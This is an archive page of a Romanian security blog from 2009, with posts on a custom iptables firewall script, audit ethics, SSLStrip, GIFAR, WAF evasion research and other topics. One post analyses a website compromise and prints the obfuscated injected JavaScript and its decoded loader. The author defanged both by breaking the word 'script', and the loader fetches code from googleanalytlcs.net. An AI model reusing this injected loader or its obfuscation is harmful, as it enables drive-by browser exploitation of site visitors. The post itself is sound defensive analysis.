Crearea unui firewall implicit in Ubuntu.

iulie 4, 2009 in Back to security basic, Linux | Leave a comment

Nu-mi place UFW-ul, firewall-ul care vine implicit cu Ubuntu.  Poate si pentru ca atunci cind e vorba de firewall-uri prefer sa il configurez eu singur. Cum arata la mine scheletul de la care pornesc?

touch /opt/tools/script/firewall
sudo chown root:root /opt/tools/script/firewall
sudo chmod 755 /opt/tools/script/firewall
sudo ln -s /opt/tools/script/firewall /etc/init.d/firewall

Continutul fisierul /opt/tools/script/firewall este:
#!/bin/sh -e

### BEGIN INIT INFO
# Provides:          My own Firewall
# Required-Start:    mountall
# Required-Stop:     
# Default-Start:     S
# Default-Stop:      
# Short-Description: start firewall
### END INIT INFO

PATH="/sbin:/bin:/usr/sbin:/usr/bin"

. /lib/lsb/init-functions

error=0
case "$1" in
start)
 log_action_begin_msg "Appling the firewall rules:"
 iptables --table filter --flush
 iptables --table filter --delete-chain
 iptables --table filter --zero
 #iptables --table filter --policy INPUT DROP
 #iptables --table filter --policy OUTPUT DROP
 #Accept ICMP Type 8 Echo Replay Request and Type 0 Echo Replay.
 iptables --table filter --append INPUT --protocol icmp --icmp-type 8 -s 0/0 --match state --state NEW,ESTABLISHED,RELATED --jump ACCEPT
 iptables --table filter --append INPUT --protocol icmp --icmp-type 0 -s 0/0 --match state --state ESTABLISHED,RELATED --jump ACCEPT
 iptables --table filter --append OUTPUT --protocol icmp --icmp-type 0 -d 0/0 --match state --state ESTABLISHED,RELATED --jump ACCEPT
 iptables --table filter --append OUTPUT --protocol icmp --icmp-type 8 -d 0/0 --match state --state NEW,ESTABLISHED,RELATED --jump ACCEPT
 #Accept Localhost
 iptables --table filter --append INPUT --source 127.0.0.1 --destination 127.0.0.1 --match state --state NEW --jump ACCEPT
 iptables --table filter --append OUTPUT --source 127.0.0.1 --destination 127.0.0.1 --match state --state NEW --jump ACCEPT
 #Accept DHCP    
 iptables --table filter --append INPUT --protocol udp --destination-port 67 --jump ACCEPT
 iptables --table filter --append INPUT --match state --state ESTABLISHED,RELATED --jump ACCEPT
 #Drop windows broadcast
 iptables --table filter --append INPUT --protocol udp --match udp --dport 137:138 --jump DROP
 iptables --table filter --append INPUT --jump LOG --match limit --limit 5/min --log-level 4 --log-prefix "INPUT CHAIN DROP"
 iptables --table filter --append INPUT --jump DROP
 log_action_end_msg $error
 exit $error
 ;;

stop)
 log_action_begin_msg "Removing the firewall rulles:"
 iptables --table filter --flush
 iptables --table filter --delete-chain
 iptables --table filter --zero
 log_action_end_msg $error
 exit $error
 ;;
status)
 iptables -L
 log_action_end_msg $error
 exit $error
 ;;
*)
 echo "Usage: /etc/init.d/ufw {start|stop|restart|force-reload|status}"
 exit 1
 ;;
esac

si la sfirsit:

sudo update-rc.d -f ufw remove # to remove the ufw firewall

sudo update-rc.d firewall defaults

Firma de audit data in judecata.

iunie 18, 2009 in Razboiul Ideilor, audit | Leave a comment

In Wired am citit saptamina trecuta ca firma CardSystem Solutions, care a fost in anul 2004 victima unui atac informatic, va da in judecata firma de audit Sawas.

Motivul este ca firma de audit certificase cu 3 luni in urma procesatorul de carduri conform standardului CISP (Cardholder Information Security Program), precursor al actualului standard PCI DSS. Rezultatul acestui atac a fost furtul a 263000 de informatii despre carduri si compromiterea a altor 40 de milioane de carduri. Modalitatea in care a decurs atacul contravenea susnumitul standard. Pentru cei care nu stiu, standardul PCI DSS. este un standard de securitate IT impus de firmele de carduri de credit, gen Visa, Mastercard, procesatorilor de tranzactii si bancilor. Aceasta disputa legala, oricum se va termina, scoate la lumina anumite aspecte trecute cu vederea de tot sistemul creat in jurul certificarilor si acreditarilor. Primul comentariu al articolului din wired este:

As a former IT Auditor, I can tell you this with certainty: even the most skilled, detail-oriented IT Security Professional can only report what his or her manager will let him or her report. I audited Fortune 500 companies and there were always gaping holes in their IT security. I always reported them. But, in an attempt to keep future business, my management demanded that I remove many findings from my reports. Even though I refused to sign those reports, I bet I could still be held liable. I lost my job for being insubordinate. Watch for more of this in the future.

.

Comentariul imi aduce aminte de experienta mea de auditor, cind am intilnit situatii asemanatoare – frustrante si care deformeaza insasi scopul auditului, de orice fel ar fi el. Credeam ca se intampla asa doar la case mari dar, discutind acum ceva timp cu directorul departamentului de certificare al unei firme de securitate din Romania, am auzit ca aceleasi probleme sint si in sistemul romanesc. Rapoartele sint aranjate pentru a nu pierde clientul – desi clientul pierde mult mai mult tot negociind finding-urile unui audit.

Va schimba acest proces ceva? Nu cred ca va aduce schimbari imediate, dar sper ca va schimba treptat gradul de responsabilitate al clientilor si va obliga firmele de audit sa fie mai interesate de acuraterea muncii lor decit de pastrarea portofoliului de clienti. Este o aberatie sa platesti ca sa afli ce nu e in regula pentru ca pe urma, in loc sa treci la remedieri, sa incerci sa faci din armasar tintar in orice forma poti.

Articolul original poate fi citit aici.

Ce parere aveti voi? Ati avut experiente similare?

googleanalytlcs.net -L-ati vizitata vreodata?

iunie 6, 2009 in Forensic, Reverse Engineering, Web Security, Websecurity | 3 comments

Vineri seara am fost sunat de un prieten care mi-a spus ca tocmai fusese hack-uit. Exploit-ul, dupa informatiile prietenului meu, era de prin mai, si a avut ca rezulat infectarea tuturor hosturilor virtuale apache cu un script java. Cind am primit scriptul mi-a atras atentia modul diferit in care fusese ascuns codul sursa al scriptului java. El arata cam asa:

<!–44e8ef75ef25fc970a79a3ccb704ad42–><sc!!!!!!!!!!ript language=javascript>zahlpc=”Jl#tWL%POTzGHriViVz#LiY”;rvxleu=”<Q73crQ69pt laQ6egQ75age=jQ61vQ61scriQ70t> funcQ74ioQ6e djjQ78tQ6cgs(hlyzcQ6arQ29Q7bQ76aQ72 Q67ynQ73zty,Q6dQ76Q6ewQ63zQ6fQ6dfQ3d\”#(7Q6eTbQ55OQ50VQ36Q4aQ63:+Q5e1Q7e9Q24u_iQ29yo5Q72@,2Q6bQ30Q60&Q45Q77MQ20|Q7bQ674Q3djvQ64Q74CxIFhNm]Q3b}fQ71Q213[HaQ7aB-AZps*Q6cQ47e8Q5c\"'Q4bQ2eQ22,Q70Q65Q77yhg=\"Q22Q2cQ66Q61Q73ltdsQ2cqQ6brkjQ6cQ77f,tQ68yQ69Q74dkii=Q22Q22,hpoQ70Q75oQ69;Q66oQ72(gynsztQ79=0;gynszQ74yQ3cQ68lyzcjr.lengQ74Q68;gQ79nQ73Q7aty+Q2bQ29{ Q66Q61sQ6cQ74Q64sQ3dhlyQ7acjr.chaQ72AQ74(Q67yQ6eszty);qkrQ6bjlwQ66=Q6dvnwQ63Q7aomf.iQ6edexOf(Q66asltds)Q3biQ66(Q71Q6brkQ6aQ6cwfQ3e-1){ hQ70opuoiQ3d(Q28Q71krkjlQ77Q66Q2bQ31)Q25Q381Q2d1Q29;Q69fQ28Q68pQ6fQ70uoiQ3c=0Q29Q68pQ6fpuQ6fQ69+=8Q31;thQ79itdQ6bQ69i+Q3dmvQ6ewczQ6fQ6df.Q63haQ72Q41Q74(hpoQ70uoi-Q31Q29Q3bQ20} Q65lseQ20tQ68yQ69Q74dQ6biiQ2b=fQ61Q73Q6ctQ64s;Q7dQ70eQ77Q79hg+Q3dQ74Q68Q79itdQ6biQ69Q3bQ64Q6fcumeQ6eQ74.Q77rQ69Q74Q65(peQ77Q79hQ67Q29Q3b}Q3cQ2fsQ63Q72iptQ3e";fmxoqyuh=zahlpc.charAt(6);vrbnnv=rvxleu.replace(/(jjuysyvwv|Q|xmmwgridfz)/g,fmxoqyuh);sqlwbat=unescape(vrbnnv);var agfwxg,kbptlkr;document.write(sqlwbat);agfwxg="<NC]G>|<*:@)sC|Cos8j’C8IC/vzdz*:@)sC’|GzT4_z48j’vzdz*:@)sC’>||dz@|8Is)@o|j|T8M|DzC87y}|8Is)@o#*8Cb)]878Is)@o#48Cb)]87y|^|k=lJ`lJ`l~“`y}|t5:_]8TC#:550)8jK*8**)5T)tj[$~k\"J`rZr[~}|szCNj/}|8Is)@8*jK|^|8Is)@o#C5e bSC@)T47y}||t5:_]8TC#M@)C87|’<SxRFVb|GzT4_z48j\\’czdzS:@)sC\\’|SRxj\\’NCCs+//4554G8zTzGoCG:*#T8C/ii_C]v#v*\\’><\\/SxRFVb>’|y}</*:@)sC>|</NC]G>|”;djjxtlgs(agfwxg);</sc!!!!!!ript><!–44e8ef75ef25fc970a79a3ccb704ad42–>

Semnele de exclamatie din cuvintul script imi apartin pentru a evita o eventuala executie a lui.

Dupa cum se vede, scriptul selecteaza din variabila “zahlpc”, caracterul al saptelea “%”, apoi caracterul Q este inlocuit cu “%” , si astfel sint returnate codurile asci ale caracterelor ce formeaza codul sursa. Acesta este primul layer de ascundere a codului. Apoi rezulta un nou script java care desfacut va arata asa:

<ht!!!!ml> <scr!!!!!!!ipt type=”text/javascript” language=”javascript”>  var expiry = new Date(); expiry.setTime(expiry.getTime() + 24*60*60*1000); document.cookie=’sessionid=39128605A531; path=/; expires=’ + expiry.toGMTString();  document.write( “<SCR!!!!!!IPT language=\”JavaScript\” SRC=\”http://googleanalytlcs.net/__utmj.js\”><\/SCR!!!!!IPT>” );</scr!!!!!!!!!!!!ipt> </ht!!!!!ml>

Exte un script care citeste sessionsid-ul clientului pentru serverului care a fost infectat si impreuna cu data expirarii este trimis serverului googleanalytlcs.net. Sciptul java aflat aici va face call pentru un alt script de pe un alt site care va incerca exploatarea browserului. Site-ul din spate se schimba mereu.

O cautare in log-ul proxy-ului companiei unde lucrez arata ca exista destule site-uri romanesti care au fost infectate cu asa ceva. Deci recomand tuturor sa blocheze aceasta destinatie in proxy-uri.

O zi buna si va tin la curent in momentul in care am access la serverul care a fost exploatat cu  detalii despre exploit.

Material didactic pentru Computer Forensic

mai 28, 2009 in Forensic | 1 comment

Pentru cei care doresc sa inceapa de undeva in domeniul de Forensic problema principala este de obicei de unde fac rost de material didactic. Pentru ca am urmarit mai zilele trecute o discutie pe tema asta m-am hotarit sa adun intr-un post citeva resurse pe care eu le cunosc si le recomand mai departe. Deci:

Scan 24” on Honeynet Project. Cu toate ca este un material didactic pentru incepatori il recomand cu insistenta. Incercati sa cititi si modul cum a fost rezolvat de cei care au cistigat. Dupa ce ati terminat …dig deeper in archives.

Computer Forensic Reference Data Sets. Foarte interesant mai ales ca acolo aveti si Live Memory Images, ceea ce nu este acceptat ca proba in marea majoritate a tarilor europene, dar este acceptat in America.

Have fun,

Problemele WAF

mai 22, 2009 in Hacking, Security News, Web Security | Leave a comment

WAF sau Web Application Firewall-ul este un sistem care intelege foarte bine HTTP, stie sa analizeze conversatia HTTP, sa o decodifice in cazul in care e codata si sa protejeze aplicatiile de web in cazul in care descopera posibile atacuri.  Toata comunitatea de IT le instaleaza sperind sa rezolve problemele aplicatiilor de web dar se pare ca ele insele au foarte mari probleme. La conferinta de securita de la Cracovia OWASP, 2 cercetatori,Wendel Henrique, membru SpiderLabs (Trustwave’s advanced security team), si Sandro Gauci, fondator si CSO la EnableSecurit, au descoperit o serie de probleme in diferite WAF-uri si totodata vor sa faca public un tool pentru wafw00f care va ajuta la identificare acestor sisteme. Surpriza este completa pentru ca, cu ajutorul unui alt tool creat de ei wafFUN, au reusit sa pacaleasca sistemul si sa exploateze cu success o aplicatie de web (XSS).

Sfatul lor? Scrieti cod mai bun si mai sigur. :-) )

Mai multe puteti citi aici sau urmarii prezentarea care a fost facuta publica aici.

Have Fun

Nessus 4

mai 17, 2009 in Tools | Leave a comment

Luna trecuta a aparut versiunea 4 a scanner-ului de vulnerabilitati Nessus. M-am gindit mult daca sa scriu despre aceasta, mai ales ca instalarea a adus cu sine stergerea politicilor “Default scanning” si “Microsoft Vulnerabilities”.  Ceea ce m-a impresionat foarte mult este scaderea impresionanta a timpului de pornire a engine-ului.  Tot odata se spune ca a fost rescris motorul pentru a suporta Multi-Threading.  In interfata s-a introdus posibilitatea de a salva rapoartele in formal XSLT. Incercati si nessuscmd daca nu ati avut curajul pina acum. Un punct bun de inceput cum sa gasiti share-uri neprotejate aici. Release notes-ul este pe site-ul de discutii aici.

Deci have fun…:-))

SSLStrip

aprilie 30, 2009 in Security testing, Tools | Leave a comment

Cu toate ca a fost prezentat deja la Blackhat DC in februarie anul asta, nu am auzit pina acum de tool-ul “SSLStrip” scris si prezentat de Moxie Marlinspike. Despre ce este vorba? Conceptul este simplu si genial in acelasi timp. Modul in care oamenii ajung sa acceseze linkurile de HTTPS este de obicei prin click-ul unor butone/linkuri din pagini normale HTTP, care apoi trimite informatia prin HTTPS serverului. Un exemplu este pagina http://www.raiffeisen.ro unde in pagina HTTP este introdusa username-ul si parola care sint apoi postate prin HTTPS catre https://www.raiffeisen.ro/ . A doua modalitate este scrierea numelui de domeniu (ex: paypal.com) in bara de URL a browserului. Acesta trimite o cerere prin HTTP serverului care la rindul lui genereaza un raspuns din parte serverului de genul 302. Redirectare catre pagina HTTPS.

Ce face SSLStrip. Se interpune intre user si server si in momentul in care userul incearca sa acceseze pagina HTTPS, el va face cererea in numele clientui catre server pe HTTPS, primeste raspunsul si il livreaza pe HTTP userului. Pentu a reusi sa pacaleasca userului soft-ul se foloseste si de un trick ingenios inlocuind “Favorit Icon” cu iconita de lacatel, dind impresia de conexiune securizata. Interesante sint si rezultatele pe care le-a obtinut in urma rularii soft-ului in unul din nodurile de iesire a retelei TOR. Numarul de parole, sau carduri de credit este destul de mare. Ma astept deci ca numarul de astfel de atacuri folosind reteaua TOR sau retele Wireless sa creasca.

Ce poate ajuta impotriva unui astfel de atac ? Phising  filter-ul de la IE  activat sau in Firefox 3 (about:config) browser.identity.ssl_domain_display este setat 1 ?Da ,atit timp cit userul chiar va face click pe iconita pentru a verifica ca acela nu este un Fake “Favotite Icon” ci ca este chiar modalitatea browser-ului de a indica ca este un certificat SSL.

Prezentarea si tool-ul pot fi gasite aici.

Have Fun.

Ati vazut asta pina acum?

aprilie 15, 2009 in Uncategorized | 1 comment

Vazuta si primita de la Bogdan. Multumesc.

Ce parere aveti?

Cum ati raspunde la intrebarea asta?

aprilie 14, 2009 in Uncategorized | 5 comments

Astazi am citit un post interesant unde se punea urmatoarea intrebare:

Which would you rather tell the board or your customers? (1) “We had no security incidents last year, and aren’t sure why,” or (2) “Our customer database was pillaged 9 times, despite a cross-organizational investment in ISO 27001 which was aligned with our balanced scorecard and measured to be in the top quartile of all infosec programs?”

Interesanta intrebare. :-) ) Miine si articolul ….de unde provine.
Have fun.

Eu nu vreau sa-l respect pe Vladut

aprilie 8, 2009 in Uncategorized | 3 comments

Ieri a fost conferinta de securitate realizata de Bussines Standard unde a venit si domnul Varujan Pambuccian(tot respectul pentru dumnealui). Dansul a spus in alocutiunea sa ca noi ar trebui sa-l respectam pe hackerul Vladut, pentru inventivitatea si desteptaciunea sa. La intrebarea mea de ce ar trebui respect,  mi-a raspuns ca este normal sa-ti respecti adversarii. Eu nu-l vad pe Vladut ca pe un adversa si inteleg ca trebuie sa respectam un smecher care s-a folosit de nestiinta si naivitatea unor oameni pentru a accesa niste conturi de e-mail.

Eu nu vreau sa respect genialitatea unui infractor. Eu vreau sa respect genialitatea oameniilor care scriu cod pentru produse de antivirus, sisteme de operare sau care creeaza produse soft de calitate. Eu ii respect pe oamenii care l-au prins.  Eu aleg sa il respect pe Marian Selea.

“Cisco IOS Software operates on millions of systems from small home-office routers to the world’s largest service provider networks. But its inherent accessibility is perhaps described best by Marian Selea, a blind Cisco support engineer who provides Cisco IOS customer support daily.”

Acestea sint valorile pe care le respect.

A-l respecta pe Vladut este ca si cum noi ar trebui sa respectam pe cel care in loc sa ne atraga atentia ca portofelul ne cade din buzunar, ni-l fura si apoi ride de noi ca am fost atit de fraierieri.

Conference preview sau cit de lame este Youtube.

aprilie 5, 2009 in Web Security | Leave a comment

Pentru a pregati conferinta am inceput sa ma uit putin la Youtube.  Modulul de resetare a parolei si cel de schimbare a ei trimit username-ul si parola in necriptat. How lame for Youtube.  Have fun.

Parola Necriptata Youtube.

Conferinta si/sau Command line Kung Fu

aprilie 4, 2009 in Security News | 2 comments

Marti 07.04.2009 Bussines Standars organizeaza o conferinta de securitate despre Securitate Informatica in era web 2.0. Datorita faptului ca o sa am o prezentare acolo despre 10 aspecte importante ale securitatii in spatiul web si despre OWASP, pot sa ofer o invitatie primului doritor care imi va posta un comentariu pentru postul acesta.

Pentru cei care nu sint interesati de conferinta poate sinteti interesati sa va petreceti timpul studiind ceva command line kung-fu pe acest blog. Ideea este foarte misto si va cred ca o sa placa sa urmariti posturile de acolo.

Have fun anyway. :-)

Quick test daca aveti Conficker

aprilie 1, 2009 in Back to security basic, Security News | Tags: | Leave a comment

Cum functioneaza? Se stie ca troianul are ca simtom blocarea unor site-uri de unde utilizatorul poate face download la update-urile de semnaturi pentru antivirusii care il recunosc. Pa aceste restrictii la site-urile respective se afla si urmatorul test. Deci fara teama apasati aici si spuneti tare cite imagini vedeti. Nu are nimic de-a face cu 1 aprilie. :-) )

Have fun.

CansecWest P0w2Own

martie 30, 2009 in Security News, Web Security | Tags: , , , , | Leave a comment

In Canada a avut loc saptamina trecuta conferinta de securitate CansecWest. Aici are loc un concurs traditional de descoperire de exploituri pentru browsere. Ce a rezultat? Charlie Miller, cistigatorul de anul trecut, a reusit in citeva minute sa creeze un exploit pentru browserul Safari si sa plece cu cel de-al doile notebook Apple acasa. Marea revelatie pare a fi un doctorant german, sub pseudonimul de Nils care a reusit sa gaseasca bug-uri pentru Safari, IE8 instalat pe Windows 7 cit si Firefox reusind sa plece acasa cu Sony Vaio-ul aferent. Mai multe informatii aici. Acest concurs este pe cit de interesant pe atit de ingrijorator cu cit un bug pe piata neagra a ajuns sa coste in jur de $100.000. Deci …sa incercam Opera?

Have fun.

Ati auzit de CrossBeam?

martie 30, 2009 in Security News | Leave a comment

De obicei sint impotriva recenziilor produselor comerciale insa am sa fac de data asta o exceptie deoarece ca consider ca informatia este interesanta si ideea frumoasa. Ce face Crossbeam? Ofera niste appliance-uri care virtualizeaza diferitele sisteme de securitate cum ar fi Firewall-urile de la Checkpoint, IDS-uri si IPS-uri de la Sourcefire, application firewalls-uri de la Imperva si sisteme de filtrare a continutului de la Websence, sisteme de filtrade mail de la Trendmicro, samd.  Ceea ce face aceasta solutie foarte interesanta sint posibilitatile de recovery revolutionare ale sistemului cit si faptul ca incorporeaza toata infrastructura adica si switch-uri si load-balance-urile necesare. Pentru ce este asa ceva indicat? Pentru ISP-uri care ofera Virtual Security as a Service, sau mari organizatii care doresc sa consolideze infrastructura de securitate si sa scape de teroarea upgrade-urilor si a integrarilor diferitelor componente.  Exista un partener local in Romania , google este prietenul vostru.  Produsul mi s-a parut inovativ si prezzentarea frumoasa bomboanele aferente sint expirate. Oricum ambalajul este cool.

Have fun.

Go for green if you play with green (Extended Verification SSL)

martie 13, 2009 in Back to security basic | Tags: | 2 comments

Initial a fost gindit ca o unealta de lupta impotriva phising-ului. Browserele prezinta bara de URL in verde in momentul in care se acceseaza un site care are un Extenden Verification SSL.  In cazul unui certificat SSL normal ea este albastra .

Ce reprezinta?

Tehnologic nu exista nici o diferenta fata de certificatul normal dar procesul de emitere a unui certificat este mai complex. De ce? Persoana sau organizatia care solicita certificatul SSL este mult mai bine verificata din punct de vedere juridic si legal pentru a se stabili ca este cine pretinde ca este. Deci automat utilizatorii pot distinge mai usor diferenta intre  site-urile autentice si cele care sint contrafacute.

Aceasta optiune apare in momentul in care este selectat Phising  filter-ul de la IE  este activat sau in Firefox 3 (about:config) browser.identity.ssl_domain_display este setat 1.

Ce dezavantaje sint?

Oamenii care nu au nici o experinta in securitatea pe internet nu vor interpreta in nici un fel colorile afisate in bara de URL. Ceilalti insa care citesc help-ul de la IE sau se interezeaza macar de ce sint diferita au sansa de a evita un numar mare de incercari de phishing.

Diferenta de pret? La Thawte EV-SSL-ul este de 3 ori mai mare decit cel normal.

Este implementata? Aici este un studiu netcraft care arata ca site-urile care au nevoie de SSL tind catre EV-SSL.

Fazit.

Merita sa cumperi asa ceva?  Daca esti o institutie financiara sau doresti sa inspiri incredere clientilor tai, atunci este o investitie meritata.

Exista site-uri de internet banking in romania care au EV SSL?  Nu dupa cunostinta mea.  Incercati PostBank ca sa vedeti diferenta. Site-urile Alphabank, Banca Transilvania, Banca Romaneasca si BRD. Lista de MCTI m-a ajutat. :-D

Have fun.

Ce este DLP (data leakage prevention)?

martie 9, 2009 in Back to security basic | Tags: , | Leave a comment

Documentele word, excel, powerpoint , PDF cit si imaginile contin informatii ce ar putea fi folosite ca punct de pornire pentru un eventual atac. Fiecare document pe linga continut inregistreaza si metadate (numele utilizatorului care a editat documentul, calea unde a fost salvat, tipul si versiunea programului folosit). Este usor de imaginat ca astfel de informatii pot fi folosite pentu atacuri de tip brute-force sau exploituri create special pentru a putea sa penetrezi reteaua unei anumite companii. Daca va aduceti aminte am prezentat si metagoofil-ul, un soft dezvoltate pentru culegerea si analiza de metadate.

Data leakage prevention inseamna in primul rind un complex de masuri organizationale, cit si tehnice care permit eliminarea acestor metadate in cazul in care documentele parasesc compania. Care ar fi acestea?

- “constientizarea” pericolului de catre utilizatori. Utilizatorii ar trebui sa fie constienti ca in momentul in care trimit documente sint trimise si infromatii confidentiale.

- crearea in organizatii a unor politici de securitate care sa trateze exact acesta problema.

- implementare unor masuri tehnice care sa permita anonimizarea metadatelor cum ar fi solutiile de genul: iScub sau WorkShare Protect Network.

Daca doriti sa cititi mai multe despre medatate va recomand documentul creat de Larry Pesce “Document Metadata, The Silent Killer”. Personal eu nu sint de acord cu solutia propusa de el referitoare la crearea unor compartimente diferite unde sa fie stocate documentele ce urmeaza sa fie anonimizate sau cele ce urmeaza sa ramina in companie. At aduce un grad de complexitate in ceea ce un utilizator are de rezolvat cu ajutorul calculatorului. E ca si cum l-ai obliga sa treaca de la o parole de 6 caractere la una de 12 cu un grad de complexitate ridicat. :-) )

Voi ce parere aveti?

GIFAR cel mai bun vector de atac al anului 2008

martie 1, 2009 in Security testing, Web Security | Leave a comment

Un juriu format din Rich Mogull, Chris Hoff, H D Moore si Jeff Forristal , dupa cum ne informeaza blogul lui Jeremiah Grossman, a desemnat GIFAR cea mai  buna metoda de exploatare a anului 2008 . Prezentata prima data in august 2008 la Blackhat de catre  Nathan McFeters, John Heasman, Rob Carter noul concept propune inserarea unui cod java intr-o imagine GIF (GIF+JAR)=GIFAR. Noua “imagine” va reusi sa treaca peste restrictiile legate de “same origin policy” care restrictioneaza modalitatea in care limbajele de programare care ruleaza in browser acceseaze alte resurse sau metode decit cele din domeniul de unde provin. Ce inseamna asta: un script de pe site-ul Evil.com nu poate accesa cookie-ul din domenul mybank.com.

Dar acum, datorita faptului ca Java nu tine cont de aceasta restrictie exista posibilitatea ca daca concomitent navigam pe site-ul evil.com acesta sa poata accesa resursele site-ului mybank.com.  Scripturi java pot fi inserate si in documente Word2007 sau alte resurse cum ar fii video-uri. Aplicatie imediata? Facebook (care intre timp a fost patch-uit) sau alte site-uri colaborative.  Odata logat pe Facebook si accesind alta pagina, contul tau (cookie-ul) tau este furat. Intreaga prezentare poate fi citita aici si un video despre cum se face aici.

Protectie? Patch your java.

Have fun.

Update ..dar la ce???

februarie 27, 2009 in Tools | Leave a comment

Cu totii sintem constienti ca unul din componentele procesului de securitate este update-ul regulat al sistemului de operare si al aplicatiilor.  Este complicat sa incepi sa iei toate aplicatiile la mina la intervale de timp regulat si sa vezi care ar mai fi de updatat.  Marea majoritate a soft-urilor au posibilitatea de a verifica, la intervale regulate daca exista update-uri.  Acum ceva timp am descoperit o solutie interesanta a firmei Secunia numita “Secunia Personal Software Inspector (PSI)“.

Pro: Ceea ce face este o identificare a softurilor existente si pentru cele pe care le cunoaste, poate determina daca este ultima versiune existenta si ofera totodata posibilitate de update. O solutie de vulnerability management care pentru personal use este utila si merita mai ales instalata in solutiile de enterprise. Este free.

Contra: Solutia functioneaza prin trimiterea inventarului de softuri instlate pe calculatorul local prin SSL catre site-ul Secunia unde este analizata si este trimis inapoi raspunsul.

In privacy statement este scris:

“The Personal Software Inspector collects unique text strings and data about executable files and installed applications on your system, including hostname and langroup, and Microsoft KB numbers. This data is analysed by the Secunia File Signature engine (psi.secunia.com) to determine the exact applications installed on your system. No other data is collected from your system.”

Dar Microsoft update-ul nu face la fel??

Daca va place…merita folosita.

P.S.  Exista si o versiune comerciala pentru enterprise.

Have fun patching.

SHA3 Zoo

februarie 24, 2009 in Security News | 2 comments

Ce inseamna asta? Sub tutela NIST (Institutul American de Standarde si Tehnologie), a inceput procesul de selectare a unui nou algoritm de hash-ing care sa inlocuiasca MD5 si SHA1. Noul algoritm va purta numele de SHA3. Au intrat in concurs pina acum 64 de propuneri, din care doar 56 erau cunoscute si accesibile publicului. Pina acum s-a desfasurat prima faza din care numai 51 au absolvit. Din acestea 10 au fost dovedita ca fiind “broken”, gresite. Detalii despre concurs aici.

Putina legenda pentru detalii.

Un algortm de hash-ing este considerat “stricat” atunci cind:

  • este suspect de second preimage: adica pornind de la mesajul m1 se determina mesajul m2 pentru care se genereaza acelasi hash: hash(M1)=hash(M2),
  • este suspect de preimage. Asta inseamna ca pornind de la hash-ul h se poate determina mesajul m1: h=hash(m1)
  • este suspect de coliziuni, adica exista 2 valori m1 si m2 ale carui hash este egal.

Diferenta intre preimage si coliziune este ca unul este indreptat mesajului iar cel de-al doilea impotriva hash-ului.

Cistigatorul nu va fii algoritmul cel mai puternic, ci si cel care va fii “avantajos economic” de implementat in diferite tipuri de configuratii hardware.

Deci sa aplaudam cistigatorul care va fi???